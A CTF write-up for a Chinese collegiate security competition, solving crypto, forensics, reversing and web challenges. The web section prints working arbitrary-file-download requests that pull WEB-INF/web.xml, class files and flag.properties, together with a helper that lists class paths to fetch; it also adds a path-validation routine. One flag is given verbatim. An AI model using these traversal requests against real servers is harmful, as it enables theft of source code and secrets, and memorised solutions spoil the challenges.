Zhejiang Province 3rd Collegiate Network and Information Security Competition Writeup



title: Zhejiang Province 3rd Collegiate Network and Information Security Competition (Preliminary) Writeup
date: 2020-10-2
tags: CTF, competition
categories:

  • CTF
  • Competition


0x001 ???了

Key points:

  • base64 decoding
  • Caesar cipher decoding

Solution:

1. Download the file, base64-decode it, then Caesar-decode the result to get the flag.

0x002 探本溯源

Key points:

  • The /download route allows arbitrary file download

Solution:

1. The /download route allows arbitrary file download: the `file` parameter names the path to fetch, and nothing stops it from pointing into WEB-INF.

2. Download WEB-INF/web.xml. It gives the class name and package path of the servlet that handles each route:

```xml
<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>

  <servlet>
    <servlet-name>FlagController</servlet-name>
    <servlet-class>com.hdu.ctf.controller.FlagController</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>FlagController</servlet-name>
    <url-pattern>/flag</url-pattern>
  </servlet-mapping>

  <servlet>
    <servlet-name>DownloadController</servlet-name>
    <servlet-class>com.hdu.ctf.controller.DownloadController</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadController</servlet-name>
    <url-pattern>/download</url-pattern>
  </servlet-mapping>
</web-app>
```

Then download the class file that the fully-qualified name maps to (package dots become directory separators under WEB-INF/classes):

```
/FmVEcVBS4j/download?file=WEB-INF/classes/com/hdu/ctf/controller/FlagController.class
```

Decompiling it gives the Java source:

```java
package com.hdu.ctf.controller;

import com.hdu.ctf.util.ConfigConstant;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.Base64;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class FlagController extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        doPost(req, resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String respMessage = "";
        Base64.Encoder encoder = Base64.getEncoder();
        PrintWriter pw = resp.getWriter();
        try {
            // The stored "flag" value is compared with base64(str), so the
            // configured value is the flag in base64 form.
            boolean isFlagEquals = ConfigConstant.getValue("flag")
                    .equals(encoder.encodeToString(req.getParameter("str").getBytes("UTF-8")));
            if (!isFlagEquals) {
                respMessage = "The  flag is incorrect";
            } else {
                respMessage = "The  flag is correct";
            }
            resp.setHeader("Content-type", "text/html;charset=UTF-8");
            resp.setCharacterEncoding("UTF-8");
            pw.write(respMessage);
            pw.flush();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

The flag comes from com.hdu.ctf.util.ConfigConstant, so download that class file the same way:

```
/FmVEcVBS4j/download?file=WEB-INF/classes/com/hdu/ctf/util/ConfigConstant.class
```

```java
package com.hdu.ctf.util;

import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;

public class ConfigConstant {
    private static Map<String, String> configStr = new HashMap<>();

    static {
        try {
            // Loaded from the classpath, i.e. WEB-INF/classes/flag.properties
            Properties ps = new Properties();
            ps.load(ConfigConstant.class.getClassLoader().getResourceAsStream("flag.properties"));
            Enumeration<?> e = ps.propertyNames();
            while (e.hasMoreElements()) {
                String key = (String) e.nextElement();
                configStr.put(key, ps.getProperty(key));
            }
        } catch (FileNotFoundException e2) {
            e2.printStackTrace();
        } catch (IOException e3) {
            e3.printStackTrace();
        }
    }

    public static String getValue(String key) {
        return configStr.get(key);
    }
}
```

So the flag comes from flag.properties, which is loaded from the classpath. Download it:

```
/FmVEcVBS4j/download?file=WEB-INF/classes/flag.properties
```

The file holds the base64-encoded flag (FlagController compares the stored value with base64 of the submitted `str`), so base64-decode it to get the flag.
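The chain above, as an added example that is not code from the original writeup: `servletClassFiles()` does the web.xml-to-class-path mapping the writeup did by hand (so every declared servlet can be pulled in one pass), and `resolveDownload()` is the check the vulnerable /download route lacked, refusing a `file` parameter that escapes the download directory or reaches WEB-INF. The sample web.xml is constructed from the one recovered above; the function names are this example's own.

```javascript
// Added example (not from the original writeup): recon helper for the
// web.xml recovered through /download, plus the path check such a route needs.

// Constructed from the web.xml shown in the writeup.
const SAMPLE_WEB_XML = `
<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <servlet>
    <servlet-name>FlagController</servlet-name>
    <servlet-class>com.hdu.ctf.controller.FlagController</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>FlagController</servlet-name>
    <url-pattern>/flag</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>DownloadController</servlet-name>
    <servlet-class>com.hdu.ctf.controller.DownloadController</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadController</servlet-name>
    <url-pattern>/download</url-pattern>
  </servlet-mapping>
</web-app>`;

// Fully-qualified class name -> path of its .class file under the webapp root.
function classFilePath(fqcn) {
  return 'WEB-INF/classes/' + fqcn.replace(/\./g, '/') + '.class';
}

// Every <servlet-class> declared in web.xml, as a path to request from /download.
// A regex is enough for a small deployment descriptor; a real tool would use an XML parser.
function servletClassFiles(webXml) {
  const paths = [];
  const re = /<servlet-class>\s*([\w$.]+)\s*<\/servlet-class>/g;
  for (let m; (m = re.exec(webXml)) !== null; ) paths.push(classFilePath(m[1]));
  return paths;
}

// The check a download handler needs: decode the parameter exactly once, collapse
// "." / ".." / empty segments, then refuse anything that is absolute, escapes the
// download directory, or lands in WEB-INF / META-INF (web.xml, classes, properties).
// Returns the normalised relative path, or null when the request must be rejected.
function resolveDownload(requested) {
  let p;
  try { p = decodeURIComponent(requested); } catch (e) { return null; } // malformed %-encoding
  if (p.includes('\0')) return null;                                     // NUL-truncation tricks
  p = p.replace(/\\/g, '/');                                             // treat "\" as a separator too
  if (p.startsWith('/')) return null;                                    // absolute path
  const parts = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {                                                  // never climb above the root
      if (parts.length === 0) return null;
      parts.pop();
      continue;
    }
    parts.push(seg);
  }
  if (parts.length === 0) return null;
  const top = parts[0].toUpperCase();
  if (top === 'WEB-INF' || top === 'META-INF') return null;
  return parts.join('/');
}
```

Whatever `resolveDownload` returns should then be joined onto a fixed download root and served from there; the decoded string is used literally, so a double-encoded `%252e%252e` stays a harmless file name rather than becoming `..` on a second decode.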

0x003 数据宝图

Key points:

  • JS code
  • Wireshark packet capture analysis

Solution:

1. Open the capture in Wireshark. It contains FTP traffic; follow the stream and save the transferred data as an image file. The image contains the URL http://sec.hdu.edu.cn:7100/26711231cdb06a90h/

The page at that URL holds obfuscated JS code:

The script is in the aaencode ("kaomoji") style, where every identifier is a face such as `ﾟωﾟﾉ` or `ﾟДﾟ`. The listing did not survive extraction (those characters came through as `?`), so it is not reproduced here; what matters for decoding is its shape: a fixed preamble that builds `Function` and the string `"return"` out of `"[object Object]"`, `"undefined"`, `"true"` and `"false"`, a long `(ﾟДﾟ)[ﾟεﾟ]+...` payload that spells an escaped string literal, and a final `(ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');` where the `('_')` is the call that actually runs the decoded code.

Converted back to plain JS:

```js
(function anonymous(
) {
    $('#GoGoGo').on('click', function () {
        var a = $(" #pass ").val();
        if (a == "welcome") {
            window.location.href = "/Easy";
        }
    });
})
```

Enter the password welcome to get the flag.

0x004 尺蠖求伸

Key points:

  • The main function
  • base64 decoding

Solution:

1. The base64 string: WkpDVEZ7ckVfMTVfSDRyRF84VTdfVTVFZnVMfQ==

2. Decoding it gives ZJCTF{rE_15_H4rD_8U7_U5EfuL}

0x005 司?家族

Key points:

  • Using IDA

Solution:

1.

2. In IDA everything is reversed, so the flag is output backwards as well; reverse it to get the flag.

0x006 樱花结局

Key points:

  • The stegsolve tool
  • base64 decoding

Solution:

1. Open the image in stegsolve and step through the bit planes one by one; one of them reveals a string.

2. base64-decode that string to get the flag.